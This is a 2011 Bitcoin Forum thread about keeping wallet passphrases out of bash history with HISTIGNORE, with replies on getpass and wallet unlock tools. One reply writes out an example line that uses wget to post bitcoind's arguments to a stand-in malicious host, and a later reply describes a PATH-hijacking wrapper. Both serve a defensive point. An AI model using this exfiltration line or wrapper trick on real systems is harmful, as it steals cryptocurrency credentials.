Bitcoin Forum
May 04, 2024, 06:50:20 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Use the CLI w/ encryption? Protect your passphrase with bash's HISTIGNORE  (Read 2278 times)
gmaxwell (OP)
Legendary
expert

Activity: 4158
Merit: 8382

View Profile WWW
December 15, 2011, 07:59:58 AM
Last edit: December 21, 2011, 07:18:12 AM by gmaxwell

So you're using that snazzy wallet encryption stuff to keep an online wallet locked up when you don't intend to send anything... but problem: You're a CLI user and you're ending up with the walletpassphrase in your shell history.

Don't worry: Bash has you covered (this is also possible in some other shells, but you're on your own there).

Just set HISTIGNORE='*walletpassphrase*' and the shell history will not remember any line with the string walletpassphrase in it.
This list is colon-separated if you want to add more patterns.

Note: walletpassphrase above is literally the string "walletpassphrase". Do not substitute your actual passphrase there! (thanks to the comments below for pointing out this potential confusion.

For example, my ~/.bashrc might look like:
Code:
$ cat ~/.bashrc
# .bashrc

# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi

# User specific aliases and functions

HISTSIZE=50000
HISTCONTROL=ignoreboth
shopt -s histappend
HISTIGNORE='*walletpassphrase*'

HISTCONTROL=ignoreboth makes the history ignore duplicate commands and commands which are prefixed with spaces, so you can keep other cruft out of your history on the fly, and HISTSIZE=50000 greatly expands the maximum history, histappend makes it append to instead of overwriting the stored history, allowing your history to go back a long way. None of these are required for thie HISTIGNORE but you might find them useful too.

After putting it in your bashrc, restart your shell.

You can instantly tell if its working, e.g.
Code:
$ ls foof
ls: cannot access foof: No such file or directory
——now push up——
$ ls foof
ls: cannot access foof: No such file or directory
$ ls walletpassphrase
ls: cannot access walletpassphrase: No such file or directory
——now push up——
$ ls foof

Of course, best security practices would be to not keep wallets that matter online, but with a little care you can increase you security for what you do keep online.

Cheers,

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
You get merit points when someone likes your post enough to give you some. And for every 2 merit points you receive, you can send 1 merit point to someone else!
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
Pieter Wuille
Legendary
qt

Activity: 1072
Merit: 1174

View Profile WWW
December 16, 2011, 09:07:02 AM

Interesting, never knew about that variable!

I do Bitcoin stuff.
sebastian

Activity: 129
Merit: 118

View Profile
December 17, 2011, 03:52:56 AM

then the attacker looks in ~/.bashrc and voila´ your wallet password on a silver plate.

Best thing here would be to create a account in the OS where all bash history and bash logs are off, and using that account for bitcoining.
Even better, use a separate liveCD dist optimized for bitcoining, then bash history is nothing to fear, just shutdown the computer when done and you are sure nothing remains of your session.
bitfoo
Donator

Activity: 289
Merit: 250

View Profile
December 17, 2011, 08:08:49 AM

then the attacker looks in ~/.bashrc and voila´ your wallet password on a silver plate.

No, I think you misunderstood. You need to literally set HISTIGNORE='*walletpassphrase*' - don't substitute 'walletpassphrase' with your actual passphrase. Since you need to type in the word 'walletpassphrase' on the command line when supplying the passphrase to bitcoin, bash won't write that particular command to the history. I think gmaxwell's example makes it pretty clear. Thanks for the useful tip, gmaxwell!

CIYAM
Legendary

Activity: 1890
Merit: 1075

Ian Knowles - CIYAM Lead Developer

View Profile WWW
December 17, 2011, 10:15:32 AM

The other standard approach for a Linux app would be to use the "getpass" function if the password option (i.e.g walletpassphrase) has been provided but without any value (although this will require changing the source).

A rough idea is as follows:

if( has_option( "walletpassphrase" ) && option_string( "walletpassphrase" ).empty( ) )
   password = getpass( "Enter password: " );

If coded this way then the password would never appear in history or even need to be seen visibly on the terminal screen (you need to roll your own function using _getch to achieve the same thing in Windoze).

Cheers,

Ian Knowles.

With CIYAM anyone can create 100% generated C++ web applications in literally minutes.

GPG Public Key | 1ciyam3htJit1feGa26p2wQ4aw6KFTejU
dunand

Activity: 637
Merit: 502

View Profile
December 17, 2011, 09:55:55 PM

I hope nobody read it like Sebastian did and put there real password in .bashrc ! Smiley

It's a nice idea to protect yourself from a bad person that use your computer and sneak on your stuff. But if a hacker have access to your computer for more than 30 seconds he can simply modify your /usr/bin/bitcoind by adding a line to send himself everything you do with bitcoind. Something like this :

wget -q --post-data=$@ malicioussiteupload.org

mcorlett
Donator

Activity: 308
Merit: 250

View Profile
December 17, 2011, 10:44:02 PM

But if a hacker have access to your computer for more than 30 seconds he can simply modify your /usr/bin/bitcoind by adding a line to send himself everything you do with bitcoind.
He would need administrative (root) permissions to modify anything in the /usr/bin directory.

dunand

Activity: 637
Merit: 502

View Profile
December 17, 2011, 11:07:29 PM

But if a hacker have access to your computer for more than 30 seconds he can simply modify your /usr/bin/bitcoind by adding a line to send himself everything you do with bitcoind.
He would need administrative (root) permissions to modify anything in the /usr/bin directory.

Indeed that was too simple to work. But the bad guy could modify the PATH and create a new bitcoind somewhere that upload the password and call the real bitcoind after.

My point was to never leave your machine unprotected.
sebastian

Activity: 129
Merit: 118

View Profile
December 18, 2011, 04:22:24 AM

Now I understand. I tought you meant that you should replace "walletpassphrase" with your actual wallet passphrase.
Since when people write in this way, its assumed that you should replace it.

Like:
"For logging in to the binary program, type binary -u=root -p=rootpassword" and then its assumed you should replace rootpassword with your actual root password.

It would be worth noting it in the thread start that you should NOT replace walletpassphrase with your actual passphrase, so people dont misunderstand it. They might think bashrc is protected in some way then.
gmaxwell (OP)
Legendary
expert

Activity: 4158
Merit: 8382

View Profile WWW
December 21, 2011, 07:21:54 AM

Now I understand. I tought you meant that you should replace "walletpassphrase" with your actual wallet passphrase.
Since when people write in this way, its assumed that you should replace it.

Good point. It's a perfectly reasonable mistake, especially if you're not a frequent CLI encryptedwallet user already. I've added a note, hopefully it is more clear now.

Having an asker interface in bitcoind would obviously be nice— but the shell exclusion is a pretty nice general mechanism, especially with the initial space ignoring that it's a good tool to have in your toolbox regardless of what goes into bitcoin.

Gavin Andresen
Legendary
qt

Activity: 1652
Merit: 2216

Chief Scientist

View Profile WWW
December 21, 2011, 09:08:17 PM

Having an asker interface in bitcoind would obviously be nice...
Use:
 contrib/wallettools/walletunlock.py
and
 contrib/wallettools/walletchangepass.py

How often do you get the chance to work on a potentially world-changing project?
Pages: [1]
  Print  

Jump to: